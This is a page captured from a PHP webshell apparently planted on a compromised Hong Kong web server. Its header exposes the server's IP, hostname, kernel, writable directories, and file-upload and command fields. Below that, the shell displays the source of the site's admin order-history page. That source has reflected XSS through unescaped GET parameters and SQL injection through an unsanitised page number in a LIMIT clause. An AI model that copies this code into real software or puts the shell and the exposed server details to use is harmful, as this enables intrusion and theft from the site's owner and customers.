403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/(Del)gepgroup.hk/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/(Del)gepgroup.hk/webadmin//view_order_history.php
<?php
//include 'config.php';
require_once("configure.php");
// Check if the user is logged in
require_once( realpath(dirname(__FILE__)) . '/../common/config.php');
require_once( realpath(dirname(__FILE__)) . '/function_is_login.php');
if (!is_login())
{
	header("Location: index.php");
	exit;
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<title>Content Management System (CMS) - Powered by One Solution Limited</title>
	<link rel="stylesheet" type="text/css" href="css/style.css" />
	<!-- Main Menu -->
	<link rel="stylesheet" type="text/css" href="css/menu.css" />
	<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
	<script type="text/javascript" src="js/ddaccordion.js"></script>
	<script type="text/javascript" src="js/menuddaccordion.js"></script>
	<!-- End Main Menu -->
</head>
<body>
<table width="1000" height="600" border="0" cellpadding="0" cellspacing="0">
	<tr>
		<td width="200" align="left" valign="top"><table width="200" border="0" cellpadding="0" cellspacing="0">
				<tr>
					<td height="70" align="left" valign="middle">&nbsp;</td>
				</tr>
				<tr>
					<td width="200" align="left" valign="top"><!-- Main Menu -->
						<?php require("menu.php");?>
						<!-- End Main Menu --></td>
				</tr>
			</table></td>
		<td width="800" align="left" valign="top"><table width="800" border="0" cellpadding="0" cellspacing="0">
				<tr>
					<td><table width="800" border="0" cellspacing="0" cellpadding="0">
							<tr>
								<td height="70" class="pagetitletxt">&nbsp;&nbsp;</td>
								<td width="50" align="center" class="icontxt">&nbsp;</td>
							</tr>
						</table></td>
				</tr>
				<tr>
					<td class="pagetitletxt">&nbsp;&nbsp;<b><img src="images/iconList.jpg" width="48" height="48" align="absmiddle" /> Order History </b></td>
				</tr>
				<tr>
					<td height="25" align="left" valign="middle" class="msg"><?php echo $_GET['msg']; ?></td>
				</tr>
				<tr>
					<td align="left" valign="middle">
						<div>
							<form action="<?=basename(__FILE__)?>" method="get">
								Customer Number:
								<select name="customer_number">
									<option value="">&nbsp;</option>
								<?php
								$sql = "SELECT cno FROM clients WHERE cstatus = 1 ORDER BY cno ASC";
								$result = mysql_query($sql);
								while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
								{
								?>
									<option value="<?=$row['cno']?>"<?=$_GET['customer_number'] == $row['cno'] ? ' selected="selected"' : ''?>><?=$row['cno']?></option>
								<?php
								}
								?>
								</select>
								<input type="submit" value="Search" />
							</form>
						</div>
						<table width="800" border="0" cellpadding="0" cellspacing="0">
							<tr><?php $columnCount = 0; ?>
								<td width="10" class="listtitletxt"></td><?php $columnCount++; ?>
								<td class="listtitletxt">Customer Number</td><?php $columnCount++; ?>
								<td class="listtitletxt">O.C. No.</td><?php $columnCount++; ?>
								<td class="listtitletxt">O.C. Date</td><?php $columnCount++; ?>
								<td class="listtitletxt">Product No.</td><?php $columnCount++; ?>
								<td class="listtitletxt">Packing</td><?php $columnCount++; ?>
								<td class="listtitletxt">Description</td><?php $columnCount++; ?>
								<td class="listtitletxt">Order Qty</td><?php $columnCount++; ?>
								<td class="listtitletxt">Shipped</td><?php $columnCount++; ?>
								<td class="listtitletxt">Currency</td><?php $columnCount++; ?>
								<td class="listtitletxt">Price</td><?php $columnCount++; ?>
								<td class="listtitletxt">P.O. No.</td><?php $columnCount++; ?>
								<td class="listtitletxt">P.O. Date</td><?php $columnCount++; ?>
								<td class="listtitletxt">Arrival Date</td><?php $columnCount++; ?>
								<?php /* <td class="listtitletxt">&nbsp;</td><?php $columnCount++; ?> */ ?>
							</tr>
							<?php
							$tbl_name="order_history";		//your table name
							// How many adjacent pages should be shown on each side?
							$adjacents = 5;
							
							/* 
							   First get total number of rows in data table. 
							   If you have a WHERE clause in your query, make sure you mirror it here.
							*/
							$join = "LEFT JOIN clients c ON c.cno = order_history.cno";
							$where = "CASE WHEN LENGTH(c.cno) > 0 THEN c.cstatus = 1 ELSE 1 = 1 END";
							$sql_customer_number = mysql_real_escape_string($_GET['customer_number']);
							$where .= strlen($_GET['customer_number']) ? " AND $tbl_name.cno = '$sql_customer_number'" : '';
							$query = "SELECT COUNT(*) as num FROM $tbl_name $join WHERE $where";
							$total_pages = mysql_fetch_array(mysql_query($query));
							$total_pages = $total_pages['num'];
							
							/* Setup vars for query. */
							$targetpage = basename(__FILE__); 	//your file name  (the name of this file)
							$limit = 10; 								//how many items to show per page
							$page = $_GET['page'];
							if($page) 
								$start = ($page - 1) * $limit; 			//first item to display on this page
							else
								$start = 0;								//if no page var is given, set start to 0
							
							/* Get data. */
							$sql = "SELECT $tbl_name.* FROM $tbl_name $join WHERE $where ORDER BY cno ASC, order_no ASC LIMIT $start, $limit";
							$result = mysql_query($sql);
							
							/* Setup page vars for display. */
							if ($page == 0) $page = 1;					//if no page var is given, default to 1.
							$prev = $page - 1;							//previous page is page - 1
							$next = $page + 1;							//next page is page + 1
							$lastpage = ceil($total_pages/$limit);		//lastpage is = total pages / items per page, rounded up.
							$lpm1 = $lastpage - 1;						//last page minus 1
							
							/* 
								Now we apply our rules and draw the pagination object. 
								We're actually saving the code to a variable in case we want to draw it more than once.
							*/
							$pagination = "";
							if($lastpage > 1)
							{	
								$pagination .= "<div class=\"pagination\">";
								//previous button
								if ($page > 1) 
									$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=$prev\">« previous</a>";
								else
									$pagination.= "<span class=\"disabled\">« previous</span>";	
								
								//pages	
								if ($lastpage < 7 + ($adjacents * 2))	//not enough pages to bother breaking it up
								{	
									for ($counter = 1; $counter <= $lastpage; $counter++)
									{
										if ($counter == $page)
											$pagination.= "<span class=\"current\">$counter</span>";
										else
											$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=$counter\">$counter</a>";					
									}
								}
								elseif($lastpage > 5 + ($adjacents * 2))	//enough pages to hide some
								{
									//close to beginning; only hide later pages
									if($page < 1 + ($adjacents * 2))		
									{
										for ($counter = 1; $counter < 4 + ($adjacents * 2); $counter++)
										{
											if ($counter == $page)
												$pagination.= "<span class=\"current\">$counter</span>";
											else
												$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=$counter\">$counter</a>";					
										}
										$pagination.= "...";
										$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=$lpm1\">$lpm1</a>";
										$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=$lastpage\">$lastpage</a>";		
									}
									//in middle; hide some front and some back
									elseif($lastpage - ($adjacents * 2) > $page && $page > ($adjacents * 2))
									{
										$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=1\">1</a>";
										$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=2\">2</a>";
										$pagination.= "...";
										for ($counter = $page - $adjacents; $counter <= $page + $adjacents; $counter++)
										{
											if ($counter == $page)
												$pagination.= "<span class=\"current\">$counter</span>";
											else
												$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=$counter\">$counter</a>";					
										}
										$pagination.= "...";
										$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=$lpm1\">$lpm1</a>";
										$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=$lastpage\">$lastpage</a>";		
									}
									//close to end; only hide early pages
									else
									{
										$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=1\">1</a>";
			
										$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=2\">2</a>";
										$pagination.= "...";
										for ($counter = $lastpage - (2 + ($adjacents * 2)); $counter <= $lastpage; $counter++)
										{
											if ($counter == $page)
												$pagination.= "<span class=\"current\">$counter</span>";
											else
												$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=$counter\">$counter</a>";					
										}
									}
								}
								
								//next button
								if ($page < $counter - 1) 
									$pagination.= "<a href=\"$targetpage?customer_number=" . $_GET['customer_number'] . "&page=$next\">next »</a>";
								else
									$pagination.= "<span class=\"disabled\">next »</span>";
								$pagination.= "</div>\n";		
							}
							
							while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
							{
							?>
								<tr>
								<td class="listtxt">&nbsp;</td>
								<td class="listtxt"><?=nl2br($row['cno'])?></td>
								<td class="listtxt"><?=nl2br($row['order_no'])?></td>
								<td class="listtxt"><?=nl2br($row['order_date'])?></td>
								<td class="listtxt"><?=nl2br($row['product_detail'])?></td>
								<td class="listtxt"><?=nl2br($row['packing'])?></td>
								<td class="listtxt"><?=nl2br($row['desc'])?></td>
								<td class="listtxt"><?=nl2br($row['quantity'])?></td>
								<td class="listtxt"><?=nl2br($row['shipped'])?></td>
								<td class="listtxt"><?=nl2br($row['currency'])?></td>
								<td class="listtxt"><?=nl2br($row['total_amount'])?></td>
								<td class="listtxt"><?=nl2br($row['po_no'])?></td>
								<td class="listtxt"><?=nl2br($row['po_date'])?></td>
								<td class="listtxt"><?=nl2br($row['arrival_date'])?></td>
								<?php /*
								<td class="listtxt">
									<form action="status_order_history.php" method="post">
										<input type="hidden" name="id" value="<?=$row['id']?>" />
										<input type="hidden" name="customer_number" value="<?=$_GET['customer_number']?>" />
										<input type="hidden" name="page" value="<?=$_GET['page']?>" />
										<input type="image" src="images/<?=$row['recordstatus'] == 1 ? 'tick' : 'cross'?>.png" title="Status" alt="Status" border="0" hspace="2" />
									</form>
								</td>
								*/ ?>
								</tr>
							<?php
							}
							?>
							
							<?php
							if (strlen($pagination))
							{
							?>
							<tr>
								<td colspan="<?=$columnCount?>"><?=$pagination?></td>
							</tr>
							<?php
							}
							?>
						</table></td>
				</tr>
			</table></td>
	</tr>
</table>
</body>
</html>
<?php
mysql_close($dbh);
?>

Youez - 2016 - github.com/yon3zu
LinuXploit